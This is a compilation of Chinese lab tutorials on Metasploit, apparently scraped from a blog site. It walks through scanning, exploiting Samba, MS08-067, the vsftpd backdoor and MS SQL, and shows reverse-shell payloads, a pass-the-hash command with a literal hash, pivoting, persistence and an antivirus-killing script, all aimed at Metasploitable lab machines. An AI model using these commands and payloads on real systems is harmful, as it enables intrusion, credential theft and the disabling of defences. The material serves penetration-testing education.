精华内容
下载资源
问答
  • metasploit渗透
    2022-04-19 14:38:11


    前言

    metasploit是一个开源工具,旨在方便渗透测测试,由Ruby程序语言编写的模块化框架,具有很好的扩展性,便于渗透测试人员开发

    一、Metasploit的模块构成

    1. Auxliaries(辅助模块)
    2. Exploit(漏洞利用模块)
    3. Payload(攻击载荷模块)
    4. Post(后期渗透模块)
    5. Encoders(编码工具模块)

    二、攻击步骤

    1. 扫描目标及系统
    2. 选择并配置一个漏洞利用模块
    3. 选择并配置一个攻击载荷模块
    4. 选择一个编码技术,用来绕过杀毒软件的查杀
    5. 渗透攻击

    三、漏洞利用

    目标机准备

    Metasploitable2是一个主要用于安全工具测试和演示常见漏洞攻击的特别制作的ubuntu操作系统
    安装地址如下:

    https://information.rapid7.com/download-metasploitable-2017.html

    账号密码都为msfadmin登录
    在这里插入图片描述

    利用过程

    kali中开启msf

    msfconsole

    在这里插入图片描述

    进行靶机版本扫描

    nmap -sV ip(这里的ip是靶机的ip)在这里插入图片描述

    通过对靶机相关信息的收集然后对exploit和payload进行选择

    选取漏洞模块

    这里发现开启了samba3.x服务
    通过search samba命令查询samba利用漏洞选取合适的漏洞利用模块
    在这里插入图片描述
    这个是按照漏洞利用难度进行排序
    这里采用exploit/multi/samba/usermap_script 漏洞利用模块

    use exploit/multi/samba/usermap_script
    show payload(查看可利用的攻击载荷模块)
    show options(可以查看模块利用条件)

    在这里插入图片描述
    在这里插入图片描述

    这里标有yes的是必须要定义的参数

    配置漏洞模块

    设置选取的攻击载荷模块

    set payload cmd/unix/reverse(这里要注意选择的模块要对应靶机的操作系统这里是Linux)

    设置靶机IP

    set RHOST 192.168.x.xxx

    设置漏洞利用端口号

    set RPORT 445

    设置发动攻击的主机IP

    set LHOST 192.168.x.xxx

    在这里插入图片描述

    进行攻击

    设置完参数发动攻击

    exploit/run
    在这里插入图片描述

    这里就会在攻击机和目标机之间建立一个shell连接,就可以通过命令进行执行任意命令
    然后输入hostname/uname -a/ifconfig…命令即可进行查询

    更多相关内容
  • 第10章-Metasploit渗透测试之制作隐藏后门-v7 本课程设计目的只用于教学,切勿使用课程中的技术进行违法活 动,学员利用课程中的造成的技术后果与讲师本人无关,倡导维护网络安 全人人有责,共同维护网络文明和谐。
  • 介绍Metasploit使用方法,进行各种各样的渗透测试
  • Metasploit渗透测试指南(中文完整清晰版).pdf 便宜实惠Metasploit渗透测试指南(中文完整清晰版).pdf 便宜实惠Metasploit渗透测试指南(中文完整清晰版).pdf 便宜实惠Metasploit渗透测试指南(中文完整清晰版).pdf 便宜...
  • 渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
  • 软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解...
  • 2012_Metasploit渗透测试仪指南_网盘永久
  • Metasploit 渗透测试.pdf

    2019-07-23 11:08:27
    Metasploit 渗透测试,渗透测试实验环境,情报搜集技术,渗透攻击案例
  • Metasploit渗透测试

    2018-08-10 13:24:59
    Metasploit 渗透测试在安全漏洞挖掘的同时,黑客们回开发概念验证性的渗透攻击代码(POC),用于验证找到的安全漏洞是否确实存在,并确认其是否可被利用
  • Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
  • Metasploit渗透测试指南 修订版,是Metasploit框架渗透测试入门畅销近十年的口碑好书!!PDF扫描版,有详细书签!
  • Metasploit渗透测试魔鬼

    2018-05-23 23:03:24
    Metasploit渗透测试魔鬼训练营教材,在里面有Metasploit环境的配置、漏洞利用教程,需要可以下载。
  • Metasploit渗透测试手册,完整扫描版

    热门讨论 2014-05-10 15:45:42
    】《metasploit渗透测试指南》介绍metasploit——近年来最强大、最流行和最有发展前途的开源渗透测试平台软件,以及基于metasploit进行网络渗透测试与安全漏洞研究分析的技术、流程和方法。 《metasploit渗透测试...
  • 英文原版 Metasploit渗透测试手册,最新版本。对渗透测试有兴趣的可以参考!
  • Metasploit渗透测试指南(全) .pdf
  • Metasploit渗透测试指南修订版》新版修订版,相较于旧版补充更新了很多
  • Metasploit渗透测试指南(中文完整清晰版)
  • metasploit渗透测试手册

    2017-06-03 21:00:34
    Metasploit渗透测试手册特色:, 描述方式直截了当、简单易懂;, 书中示例经过仔细甄选,涵盖了大多数常见问题;, 剖析问题直击本质,解决问题简单高效;, 步骤式解读问题的解决方案;, 书中的解决方案可以应用到其他...
  • 渗透测试流程概述 顺序 渗透标准 渗透阶段 前期交互阶段 情报搜集阶段 威胁建模阶段 漏洞分析阶段 渗透攻击阶段 后渗透分析阶段 报告阶段 环境搭建 网络环境 虚拟机镜像 BT5 owasp bwa靶机 Win2K3 ...

    目录

    渗透测试流程概述

    顺序

    渗透标准

    渗透阶段

    环境搭建

    网络环境拓扑

    虚拟机镜像 

    攻击机-kali

    靶机-门户网站 OWASP BWA

    靶机-网关 Metasploitable_Ubuntu

    靶机- 服务器 Win2K3 metasploitable

    靶机-内网 WinxpSP3 metasploitable

    参考


    渗透测试流程概述

    顺序

    • 攻击前(网络踩点、网络扫描、网络查点)
    • 攻击中(利用漏洞信息进行渗透攻击、获取权限)
    • 攻击后(后渗透维持攻击、文件拷贝、木马植入、痕迹擦除)

    渗透标准

    • 安全测试方法学开源手册
    • NISP SP800-42网络安全测试指南
    • OWASP十大Web应用安全威胁项目
    • Web安全威胁分类标准
    • PTES渗透测试执行标准

    渗透阶段

    前期交互阶段

    渗透测试范围、目标、限制条件、服务合同
    收集客户需求、准备测试计划、定义测试范围、定义业务目标

    情报搜集阶段

    公开信息查询
    Google Hacking
    社会工程学
    网络踩点.
    扫描探测
    被动监听
    服务查点

    威胁建模阶段

    漏洞分析阶段

    结合安全漏洞扫描结果和服务查点信息
    针对关键系统服务进行漏洞挖掘

    公共资源库

    • CNNVD
    • CNVD
    • 乌云安全漏洞报告平台
    • SCAP中文社区
    • CVE
    • NVD
    • SecurityFocus
    • OSVDB
    • Seebug
    • 补天

    渗透攻击阶段

    后渗透分析阶段

    报告阶段

    环境搭建

    网络环境拓扑

    待搭建环境

    配置VMware与主机相同网段

    VMnet1
    VMnet8
    NAT设置

    注意:DHCP设置中结束IP地址最后为255,否则后序端口扫描,254的那台会失败。 

    DHCP设置
    主机ipconfig

    虚拟机镜像

    选择.vmx,使用VMware打开,选择我已复制该虚拟机。

    其中,BT5太老了,都使用kali了,于是我换成了kali,接下来进行具体虚拟机的配置。

    dvssc环境
    虚拟机类型ip域名区间网段
    kali初始攻击点机192.168.31.128attacker.dvssc.comDMZ区
    OWASP BWA门户网站服务器192.168.31.129www.dvssc.com   DMZ区
    Win2K3 Metasploitable后台服务器192.168.31.130service.dvssc.comDMZ区
    Metasploitable_ubuntu网关服务器192.168.10.254、192.168.31.254gate.dvssc.com连接DMZ区和企业内网
    WinXPenSP3 Metasploitable内网客户端主机192.168.10.128intranet1.dvssc.com企业内网

    攻击机-kali

    硬件设置

    ip设置

    vim /etc/network/interfaces

    systemctl restart networking.service

     使用ifconfig命令查看ip是否修改成功。

    DNS设置

    vim /etc/resolv.conf

     上面三个DNS一般都可以。可以ping下百度试试能否上网。

    ping百度成功

    修改主机映射

    vim /etc/hosts

    192.168.31.128 attacker.dvssc.com
    192.168.31.129 www.dvssc.com
    192.168.31.130 service.dvssc.com
    192.168.31.254 gate.dvssc.com

    如果是自己,就写127.0.0.1即可,后面的靶机不再赘述。

    修改主机映射

    靶机-门户网站 OWASP BWA

    硬件设置

    其他设置步骤同上,不再赘述

    systemctl没有安装可以使用

    /etc/init.d/networking restart

    来重启网络,浏览器输入ip后可查看dvssc门户网站,说明此靶机配置成功。

    访问dvscc网站

    靶机-网关 Metasploitable_Ubuntu

    ip及DNS设置

    命令和前面一样,不再赘述

    作为内外网网关,有两个网卡,都需要设置好。

    ip设置

     

    靶机- 服务器 Win2K3 metasploitable

    硬件设置

    ip设置

    打开cmd命令窗口,输入命令

    netsh
    int ip

     然后修改

    set address name="Local Area Connection" source=static addr=192.168.31.130 mask=255.255.255.0 gateway=192.168.31.1 1
    设置ip

    Oracle服务开启

    按照桌面的oracle startup.txt开启即可。

    C:\oracle\product\10.2.0\db_1\BIN\sqlplus.exe /nolog
    conn sys/mima1234 as sysdba
    startup
    exit

    开启Oracle服务

     如遇 ERROR: ORA-12560:TNS:protocol adapter error,可开启MyComputer->Manage->Service->OracleServiceORCL:

     

    靶机-内网 WinxpSP3 metasploitable

    ip配置

    ip

    总结

    本文主要配置了DMZ区和内网环境

    • 都配置了ip、dns和主机映射
    • 网关Metasploitable_Ubuntu,配置了两个ip
    • 后台服务器Win2K3 metasploitable需要开启Oracle服务
    • 配置好后DMZ区的可以互相ping通,也可以ping通网关,企业内网可以ping通网关

    参考

    《MetaSploit渗透测试魔鬼训练营》第1、2章

    下一篇:《MetaSploit渗透测试魔鬼训练营》之信息搜集

    更多内容查看:网络安全-自学笔记

    喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。

    展开全文
  • Metasploit渗透测试指南

    千次阅读 2020-12-07 22:01:14
    目录 1.Metasploit与nmap 1.将Nmap输出的结果导入metasploit ​2.在msf中使用nmap ​2.针对性扫描 1.SMB服务器消息块协议扫描 ​2.搜寻配置不当的Mircrosoft SQL Server ...专用漏洞扫描器——1....​2....渗透攻击

    目录

    1.Metasploit与nmap

    1.将Nmap输出的结果导入metasploit

    ​2.在msf中使用nmap

    ​2.针对性扫描

    1.SMB服务器消息块协议扫描

    ​2.搜寻配置不当的Mircrosoft SQL Server

    ​3.ssh服务扫描

    ​4.FTP扫描

    5.简单网络管理协议扫描

    ​6.NetBIOS协议扫描

    漏洞扫描

    使用Nessus扫描

    专用漏洞扫描器——1.验证SMB登录

    ​2.扫描开放的VNC虚拟网络计算空口令

    3.扫描开放的X11服务器

    渗透攻击

    1.对windows xp的攻击

    2.攻击Metasploitable主机

    Meterpreter

    1.使用nmap扫描

    2.攻击MS SQL

    xp_cmdshell

    meterpreter基本命令

    通过跳板xp攻击metasploitable

    使用Meterpreter脚本

    1.vnc

    ​2.迁移进程

    3.关闭杀毒软件

    ​4.hashdump

    ​5.查看目标机器上的流量

    ​6.获取系统信息

    ​7.控制持久化

    ​8.通过附加的Railgun组件操作WindowsAPI


    Metasploit与nmap

    1.将Nmap输出的结果导入metasploit

    nmap -T4 -Pn -sS -A -oX result.xml 192.168.0.0/24
    
    msf5 > db_status
    db_import /home/kali/result.xml
    hosts -c address

     

    2.在msf中使用nmap

    db_nmap -sS -A 192.168.0.104
    services -u 

     

    2.针对性扫描

    1.SMB服务器消息块协议扫描

    msf5 > use auxiliary/scanner/smb/smb_version 
    msf5 auxiliary(scanner/smb/smb_version) > show options 
    msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.104
    RHOSTS => 192.168.0.104
    msf5 auxiliary(scanner/smb/smb_version) > run
    

     

    2.搜寻配置不当的Mircrosoft SQL Server

    msf5 > use auxiliary/scanner/mssql/mssql_ping 
    msf5 auxiliary(scanner/mssql/mssql_ping) > show options 
    msf5 auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/mssql/mssql_ping) > set THREADS 255
    THREADS => 255
    msf5 auxiliary(scanner/mssql/mssql_ping) > run
    

     

    3.ssh服务扫描

    msf5 > use auxiliary/scanner/ssh/ssh_version 
    msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/ssh/ssh_version) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/ssh/ssh_version) > run
    

     

    4.FTP扫描

    1.版本扫描

    msf5 > use auxiliary/scanner/ftp/ftp_version 
    msf5 auxiliary(scanner/ftp/ftp_version) > show options 
    msf5 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/ftp/ftp_version) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/ftp/ftp_version) > run
    

    2.检查是否允许匿名登录

    msf5 > use auxiliary/scanner/ftp/anonymous 
    msf5 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/ftp/anonymous) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/ftp/anonymous) > run
    

     

    5.简单网络管理协议扫描

    msf5 > use auxiliary/scanner/snmp/snmp_login 
    msf5 auxiliary(scanner/snmp/snmp_login) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/snmp/snmp_login) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/snmp/snmp_login) > run
    

     

    6.NetBIOS协议扫描

    msf5 > use auxiliary/scanner/netbios/nbname 
    msf5 auxiliary(scanner/netbios/nbname) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/netbios/nbname) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/netbios/nbname) > run
    

     

    漏洞扫描

    使用Nessus扫描

    dpkg -i Nessus-8.12.1-debian6_amd64.deb 
    /bin/systemctl start nessusd.service
    https://kali:8834/

    1.导入nessus扫描结果

    msf5 > db_status
    [*] Connected to msf. Connection type: postgresql.
    msf5 > db_import /home/kali/Downloads/My_Basic_Network_Scan_vdxc5z.nessus
    
    
    
    msf5 > hosts -c address,svcs,vulns
    vulns    #查看漏洞详细信息列表

     

    2.msf中使用nessus扫描

    load nessus
    nessus_connect nessus:nessus@localhost:8834 ok    #连接nessus
    nessus_policy_list       #查看策略
    nessus_scan_new <UUID of Policy> <Scan name> <Description> <Targets>    #新建扫描目标
    nessus_scan_launch      #运行扫描
    nessus_scan_list        #查看扫描列表
    nessus_db_imprt id      #导入msf数据库
    

     

     

     

    专用漏洞扫描器——1.验证SMB登录

    msf5 > use auxiliary/scanner/smb/smb_login
    msf5 auxiliary(scanner/smb/smb_login) > show options 
    msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.0.100-110
    RHOSTS => 192.168.0.100-110
    msf5 auxiliary(scanner/smb/smb_login) > set SMBUSER administrator
    SMBUSER => administrator
    msf5 auxiliary(scanner/smb/smb_login) > set SMBPASS 123
    SMBPASS => 123
    msf5 auxiliary(scanner/smb/smb_login) > set VERBOSE false    #不输出所有的尝试
    VERBOSE => false
    msf5 auxiliary(scanner/smb/smb_login) > run
    

     

    2.扫描开放的VNC虚拟网络计算空口令

    msf5 > use auxiliary/scanner/vnc/vnc_none_auth 
    msf5 auxiliary(scanner/vnc/vnc_none_auth) > show options 
    
    Module options (auxiliary/scanner/vnc/vnc_none_auth):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT    5900             yes       The target port (TCP)
       THREADS  1                yes       The number of concurrent threads (max one per host)
    
    msf5 auxiliary(scanner/vnc/vnc_none_auth) > set RHOSTS 192.168.0.105
    RHOSTS => 192.168.0.105
    msf5 auxiliary(scanner/vnc/vnc_none_auth) > run

    vncviewer 192.168.0.105    #vnc连接
    

    3.扫描开放的X11服务器

     

    渗透攻击

    1.对windows xp的攻击

    1.使用nmap扫描

    nmap -sT -A --script=smb-vuln-ms08-067.nse -P0 192.168.0.106

     

    2.搜索并使用ms08_067渗透攻击模块

    msf5 > search ms08_067
    msf5 > use exploit/windows/smb/ms08_067_netapi
    msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/ms08_067_netapi) > show targets 
    msf5 exploit(windows/smb/ms08_067_netapi) > set target 10
    target => 10
    msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.0.109
    LHOST => 192.168.0.109
    msf5 exploit(windows/smb/ms08_067_netapi) > set LPORT 8008
    LPORT => 8008
    msf5 exploit(windows/smb/ms08_067_netapi) > show options 
    msf5 exploit(windows/smb/ms08_067_netapi) > exploit 

     

    3.sessions模块

    meterpreter > shell                                           #进入目标机器的shell
    C:\WINDOWS\system32>ipconfig
    meterpreter > background                                      #后台运行反弹shell
    msf5 exploit(windows/smb/ms08_067_netapi) > sessions -l -v    #查看meterpreter会话的详细信息
    msf5 exploit(windows/smb/ms08_067_netapi) > sessions -i 2     #进入session id为2的会话
    
    

     

    2.攻击Metasploitable主机

    1.nmap扫描

    nmap -sT -A -P0 192.168.0.105

     

    2.搜索vsftpd渗透攻击模块

    search vsftpd
    msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads 
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact 
    payload => cmd/unix/interact
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.0.105
    RHOSTS => 192.168.0.105
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 
    

     

     

    Meterpreter

    xp安装ms_sql

    1.使用nmap扫描

    nmap -sT -A -P0 192.168.0.106

     

    2.攻击MS SQL

    2.1扫描目标系统的udp 1434端口

     

    2.2通过mssql_ping模块找出MS SQL服务端口,并进行用户名和口令的猜解

    msf5 > use auxiliary/scanner/mssql/mssql_ping 
    msf5 auxiliary(scanner/mssql/mssql_ping) > show options 
    msf5 auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 auxiliary(scanner/mssql/mssql_ping) > set THREADS 50
    THREADS => 50
    msf5 auxiliary(scanner/mssql/mssql_ping) > exploit 

     

    2.3暴力破解MS SQL服务

    msf5 > use auxiliary/scanner/mssql/mssql_login 
    msf5 auxiliary(scanner/mssql/mssql_login) > show options 
    msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /root/pass.txt
    PASS_FILE => /root/pass.txt
    msf5 auxiliary(scanner/mssql/mssql_login) > set THREADS 10
    THREADS => 10
    msf5 auxiliary(scanner/mssql/mssql_login) > set VERBOSE false
    msf5 auxiliary(scanner/mssql/mssql_login) > set USERNAME sa
    USERNAME => sa
    msf5 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 auxiliary(scanner/mssql/mssql_login) > exploit 

     

    xp_cmdshell

    msf5 > use exploit/windows/mssql/mssql_payload
    msf5 exploit(windows/mssql/mssql_payload) > show options 
    msf5 exploit(windows/mssql/mssql_payload) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(windows/mssql/mssql_payload) > set LHOST 192.168.0.106
    LHOST => 192.168.0.106
    msf5 exploit(windows/mssql/mssql_payload) > set LPORT 5555
    LPORT => 5555
    msf5 exploit(windows/mssql/mssql_payload) > unset LHOST 
    Unsetting LHOST...
    msf5 exploit(windows/mssql/mssql_payload) > set LHOST 192.168.0.109
    LHOST => 192.168.0.109
    msf5 exploit(windows/mssql/mssql_payload) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 exploit(windows/mssql/mssql_payload) > set PASSWORD 123
    PASSWORD => 123
    msf5 exploit(windows/mssql/mssql_payload) > exploit 
    

     

    meterpreter基本命令

    1.截屏

    meterpreter > screenshot
    Screenshot saved to: /home/kali/NCqEAJcr.jpeg
    

    2.sysinfo

    meterpreter > sysinfo 
    Computer        : XP-1A6862CF7BC
    OS              : Windows XP (5.1 Build 2600, Service Pack 2).
    Architecture    : x86
    System Language : zh_CN
    Domain          : MSHOME
    Logged On Users : 3
    Meterpreter     : x86/windows
    

    3.hashdump

     

    4.传递哈希值

    当抓取到Hash值,无法在短时间内破解出明文密码,可以通过传递hash值,使用windows/smb/psexec模块

    msf5 > use windows/smb/psexec
    msf5 exploit(windows/smb/psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/psexec) > set LHOST 192.168.0.109
    LHOST => 192.168.0.109
    msf5 exploit(windows/smb/psexec) > set LPORT 443
    LPORT => 443
    msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 exploit(windows/smb/psexec) > set SMBPASS ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678
    

     

     

    通过跳板xp攻击metasploitable

     

    1.建立路由

    meterpreter > run get_local_subnets 
    msf5 > route add 192.168.0.0 255.255.255.0 2        #192.168.0.0/24是metasploitable的网络   2是session id
    [*] Route added
    msf5 > route print 
    

    2.攻击

    msf5 > use exploit/unix/ftp/vsftpd_234_backdoor 
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact 
    PAYLOAD => cmd/unix/interact
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.0.105
    RHOSTS => 192.168.0.105
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > ifconfig
    

     

    使用Meterpreter脚本

     

    1.vnc

    meterpreter > run vnc
    meterpreter > run screen_unlock 

     

    2.迁移进程

    run post/windows/manage/migrate

     

    3.关闭杀毒软件

    run killav

     

    4.hashdump

     

    5.查看目标机器上的流量

    run packetrecorder -i 1
    

     

    6.获取系统信息

    meterpreter > run scraper 
    

     

    7.控制持久化

    meterpreter > run persistence -X -i 50 -p 443 -r 192.168.0.109    #-X开机自启动, -I 50秒重连一次
    
    
    msf5 > use exploit/multi/handler 
    msf5 exploit(multi/handler) > show options
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > exploit 
    
    

     

    8.通过附加的Railgun组件操作WindowsAPI

     

    展开全文
  • Metasploit渗透测试魔鬼训练营 诸葛建伟 陈力波 孙松柏 王衍 田繁 学习笔记 |Linux Metasploitable | Linux靶机 | 下载vmware虚拟机镜像 |WinXP Metasploitable | Windows靶机 | 下载vmware虚拟机镜像 |OWASP BWA ...

    Metasploit渗透测试魔鬼训练营学习笔记

    法律常识

    中华人民共和国网络安全法》已由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,现予公布,自2017年6月1日起施行。
    第二十条 国家支持企业和高等学校、职业学校等教育培训机构开展网络安全相关教育与培训,采取多种方式培养网络安全人才,促进网络安全人才交流。
    第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。
    第四十四条 任何个人和组织不得窃取或者以其他非法方式获取个人信息,不得非法出售或者非法向他人提供个人信息。
    第四十六条 任何个人和组织应当对其使用网络的行为负责,不得设立用于实施诈骗,传授犯罪方法,制作或者销售违禁物品、管制物品等违法犯罪活动的网站、通讯群组,不得利用网络发布涉及实施诈骗,制作或者销售违禁物品、管制物品以及其他违法犯罪活动的信息。
    第四十八条 任何个人和组织发送的电子信息、提供的应用软件,不得设置恶意程序,不得含有法律、行政法规禁止发布或者传输的信息。

    前言

    本篇学习笔记主要涉及《Metasploit渗透测试魔鬼训练营》实验,原理篇见原书和其他文章。因阅读《Metasploit渗透测试魔鬼训练营》时发现有些实验方法与当前年份无法匹配,故撰写该篇学习笔记,如Back Track5已经停止维护现为Kali Linux,Kali Linux虚拟机占用资源远超于Windows应用Kali Linux占用资源等。

    环境准备

    环境概览

    环境名称用途备注
    Linux MetasploitableLinux靶机下载vmware虚拟机镜像
    WinXP MetasploitableWindows靶机下载vmware虚拟机镜像
    OWASP BWAWeb服务器靶机下载vmware虚拟机镜像
    Win2K3 MetasploitableWindows靶机下载vmware虚拟机镜像
    Kali LinuxLinux攻击机宿主机Windows 10上安装Metasploit/Kali Linux

    环境下载

    链接: https://pan.baidu.com/s/1I-OkdUcTwEx-TDoTT29hsw?pwd=rjpi
    提取码: rjpi

    环境部署

    在这里插入图片描述

    在这里插入图片描述在这里插入图片描述

    在这里插入图片描述在这里插入图片描述

    vmware虚拟网络编辑器配置

    在这里插入图片描述在这里插入图片描述

    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述虽然所有靶机的地址应为DHCP获取,但是为了方便与书中保持一致,还是暂时配置为Static地址

    Linux Metasploitable网络配置

    在这里插入图片描述

    vi /etc/network/interfaces
    
    auth l0
    iface l0 inet loopback
    
    auto eth0
    iface eth0 inet static
    address 10.10.10.254
    netmask 255.255.255.0
    
    auto eth1
    iface eth1 inet static
    address 192.168.10.254
    netmask 255.255.255.0
    
    ifdown eth0
    ifdown eth0
    
    ifup eth0
    ifup eth1
    

    WinXP Metasploitable网络配置

    在这里插入图片描述

    C:\Documents and Settings\Administrator>ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
            Connection-specific DNS Suffix  . :
            IP Address. . . . . . . . . . . . : 192.168.10.128
            Subnet Mask . . . . . . . . . . . : 255.255.255.0
            Default Gateway . . . . . . . . . : 192.168.10.254
    

    OWASP BWA网络配置

    在这里插入图片描述

    vi /etc/network/interfaces
    
    auto l0
    iface l0 inet loopback
    
    auto eth0
    iface eth0 inet static
    address 10.10.10.129
    netmask 255.255.255.0
    gateway 10.10.10.254
    
    ifdown eth0
    
    ifup eth0
    

    Win2K3 Metasploitable网络配置

    在这里插入图片描述

    C:\Documents and Settings\Administrator>ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
       Connection-specific DNS Suffix  . :
       IP Address. . . . . . . . . . . . : 10.10.10.130
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 10.10.10.254
    

    网络配置成功标志

    网络配置成功标志为每台设备都能ping通其他的所有地址,若单向能ping通,但双向ping不通可能是主机的防火墙策略拦截,属正常现象

    ping 192.168.10.254
    ping 10.10.10.254
    ping 192.168.10.128
    ping 10.10.10.128
    ping 10.10.10.129
    ping 10.10.10.130
    

    对于环境中的IP均有相关的DNS域名配置信息,配置hosts文件配置对应的IP和域名解析情况
    备注:在修改hosts文件前,要将属性中的只读勾选去掉,同时添加Everyone完全控制权限,在修改完成后将只读勾选,同时删除Everyone用户

    notepad C:\Windows\System32\drivers\etc\hosts
    
    10.10.10.128	attacker.dvssc.com
    10.10.10.129	www.dvssc.com
    10.10.10.130	service.dvssc.com
    10.10.10.254	gate.dvssc.com
    192.168.10.128	intranet1.dvssc.com
    

    在这里插入图片描述在这里插入图片描述

    Windows 10宿主机安装Metasploit/Kali Linux

    下载Metasploit,双击msi文件运行后安装默认位置即可,配置环境变量c:/metasploit-framework
    https://windows.metasploit.com/

    或者在Windows 10应用商店中下载Kali Linux(亲测Kali Linux因网络配置原因无法使用辅助模块扫描等操作,推荐直接安装Metasploit,使用Kali Linux环境安装其他有且仅能Kali Linux环境安装的应用)

    在这里插入图片描述

    参考链接:
    https://zhuanlan.zhihu.com/p/462187821
    https://baijiahao.baidu.com/s?id=1689395460377352647&wfr=spider&for=pc
    https://blog.csdn.net/qq_44159028/article/details/114635276

    初识msfconsole

    运行msfconsole

    msfconsole
    
    PS C:\Users\IDEA> msfconsole
    C:/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead
                                                  `:oDFo:`
                                               ./ymM0dayMmy/.
                                            -+dHJ5aGFyZGVyIQ==+-
                                        `:sm⏣~~Destroy.No.Data~~s:`
                                     -+h2~~Maintain.No.Persistence~~h+-
                                 `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
                              ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
                           -++SecKCoin++e.AMd`       `.-:/+hbove.913.ElsMNh+-
                          -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-
                          :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:
                          :we're.all.alike'`                     The.PFYroy.No.D7:
                          :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:
                          :msf>exploit -j.                       :Ns.BOB&ALICEes7:
                          :---srwxrwx:-.`                        `MS146.52.No.Per:
                          :<script>.Ac816/                        sENbove3101.404:
                          :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:
                          :09.14.2011.raid                       /STFU|wall.No.Pr:
                          :hevnsntSurb025N.                      dNVRGOING2GIVUUP:
                          :#OUTHOUSE-  -s:                       /corykennedyData:
                          :$nmap -oS                              SSo.6178306Ence:
                          :Awsm.da:                            /shMTl#beats3o.No.:
                          :Ring0:                             `dDestRoyREXKC3ta/M:
                          :23d:                               sSETEC.ASTRONOMYist:
                           /-                        /yo-    .ence.N:(){ :|: & };:
                                                     `:Shall.We.Play.A.Game?tron/
                                                     ```-ooy.if1ghtf0r+ehUser5`
